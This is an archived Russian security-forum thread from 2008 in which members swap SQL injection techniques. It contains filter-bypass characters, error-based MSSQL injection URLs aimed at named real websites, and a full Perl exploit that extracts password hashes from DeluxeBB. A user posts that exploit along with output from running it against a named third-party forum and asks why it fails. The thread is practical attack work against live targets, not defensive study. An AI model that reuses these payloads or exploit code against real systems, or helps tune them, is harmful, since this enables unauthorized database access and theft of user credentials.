FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 215 из 2422

215

Опции темы

Поиск в этой теме

Опции просмотра

30.05.2008, 08:09

1SeTh

Участник форума

Регистрация: 17.02.2006

Сообщений: 189

Провел на форуме:
2406659

Репутация: 34

чем можно заменить + или %20 и еще /**/ на что то другое?

30.05.2008, 08:18

z3r0cool

Познающий

Регистрация: 22.04.2008

Сообщений: 32

Провел на форуме:
137918

Репутация: 56

Отправить сообщение для z3r0cool с помощью ICQ

Цитата:

Сообщение от 1SeTh

чем можно заменить + или %20 и еще /**/ на что то другое?

%09, а вообще, почитай про "управляющие символы" здесь:
http://ru.wikipedia.org/

Последний раз редактировалось z3r0cool; 30.05.2008 в 08:41..

30.05.2008, 12:29

brasco2k

Постоянный

Регистрация: 23.11.2007

Сообщений: 342

Провел на форуме:
1215706

Репутация: 310

Цитата:

Сообщение от 1SeTh

чем можно заменить + или %20 и еще /**/ на что то другое?

+, /**/, %20, %09, %0a, %0d, %2b.

30.05.2008, 08:17

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Цитата:

Сообщение от +toxa+

разделение запросов может быть если делать mysql_real_connect()

union select null from blablabla
И как тут делать mysql_real_connect() ? Что то я тебя понять не могу.

__________________
..

Последний раз редактировалось .Slip; 30.05.2008 в 08:26..

30.05.2008, 17:03

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

Цитата:

Сообщение от .Slip

union select null from blablabla
И как тут делать mysql_real_connect() ? Что то я тебя понять не могу.

Я говорю что вообще это вожможно)

Цитата:

Сообщение от 0nep@t0p

Хмм, а как определить попадают ли данные из второго поля в другой запрос и сколько в другом запросе полей ? Scipio об этом ничего не писал

Данные попадают во второй запрос если там используются. Количество полей зависит только от их количества в запросе. И вообще не у одного Scipio хватило мозга придумать такое, раньше такое тоже пользовали.

__________________

30.05.2008, 17:29

SeeJay

Новичок

Регистрация: 21.02.2006

Сообщений: 18

Провел на форуме:
163552

Репутация: 1

Ребятки подскажите, пожалуйста, почему не работает Exploit.
Exploit…

Код:

#!/usr/bin/perl

use IO::Socket;


print q{
######################################################
#   DeluxeBB  Remote SQL Injection Exploit           #
#   vbulletin Remote SQL Injection Exploit           #
#      //  SekoMirza // Turkish Hackerz              #
######################################################
};

if (!$ARGV[2]) {

print q{ 
        Usage: perl dbbxpl.pl host /directory/ victim_userid 
  
       perl dbbxpl.pl www.somesite.com /forum/ 1


};

}


$server = $ARGV[0];
$dir    = $ARGV[1];
$user   = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid   = $ARGV[5];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>]    DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path  = $dir;
$path .= 

"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%

20WHERE%20(uid='".$user ;

 
print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED ";
print "[~] SENDING QUERY... ";
print $socket "GET $path HTTP/1.1 ";
print $socket "Host: $server ";
print $socket "Accept: */* ";
print $socket "Connection: close ";
print "[+] DONE! ";



print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{

 if ($answer =~/(\w{32})/)
{

  if ($1 ne 0) {
     print "Password Hash is: ".$1." ";
print "--------------------------------------------------------------------------------------\r\n";

      }
exit();
}


}
print "------------------------------------------------------------------------------------------------\r\n";

#########################################################
#Shoutz:                                                #
#  							#
# My Sweet -> Caramel 					#
# For Mp3s -> Hypn0sis					#
# For Support -> [WwW.StarHack.Org]			#
# My Bro -> PhantomOrchid				#
# My Preceptor -> Earnk Kazno 				#
#########################################################

C:\usr\bin>dbbxpl.pl www.forum.profiforex.ru / 24

################################################## ####
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
# // SekoMirza // Turkish Hackerz #
################################################## ####
--------------------------------------------------------------------------------
----------------
[>] SERVER: www.forum.profiforex.ru
[>] DIR: /
[>] USERID: 24
--------------------------------------------------------------------------------
----------------

[~] PREPARE TO CONNECT...
[+] CONNECTED [~] SENDING QUERY... [+] DONE! --[ REPORT ]-----------------------
-------------------------------------------------------------
--------------------------------------------------------------------------------
----------------

Вернее он работает, но как-то не информативно.

30.05.2008, 11:00

diznt

Постоянный

Регистрация: 31.01.2008

Сообщений: 643

Провел на форуме:
6128108

Репутация: 445

http://www.kdo.ru/article.asp?id=5709&cid=-1' хз что тут вообще надо делать и возможна ли скул

30.05.2008, 11:13

z3r0cool

Познающий

Регистрация: 22.04.2008

Сообщений: 32

Провел на форуме:
137918

Репутация: 56

Цитата:

Сообщение от diznt

http://www.kdo.ru/article.asp?id=5709&cid=-1' хз что тут вообще надо делать и возможна ли скул

Используй ошибки для вывода данных.

http://www.kdo.ru/article.asp?id=5709&cid=(SELECT+TOP+1+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES)

30.05.2008, 11:17

Dima-k17

Познающий

Регистрация: 15.09.2005

Сообщений: 60

Провел на форуме:
254802

Репутация: 52

Отправить сообщение для Dima-k17 с помощью ICQ

Цитата:

Сообщение от diznt

http://www.kdo.ru/article.asp?id=5709&cid=-1' хз что тут вообще надо делать и возможна ли скул

ммммм.... Обчный МССкуль=)

Код:

http://www.kdo.ru/article.asp?id=5709&cid=1%20OR%201=@@version

А на мой вопрос в этой теме так и не ответили((((
---
Не успел отправить=)

#10

30.05.2008, 13:59

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Отправить сообщение для AFoST с помощью ICQ

Чёт не разберусь никак с одной скулей...Может кто справится!?

Код:

http://micropig.com/microlink/?srch=2&start=30&searchtext=ya.ru'
http://micropig.com/microlink/category/58/start/3'

Страница 215 из 2422

215

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)

Быстрый переход

ANTICHAT.XYZ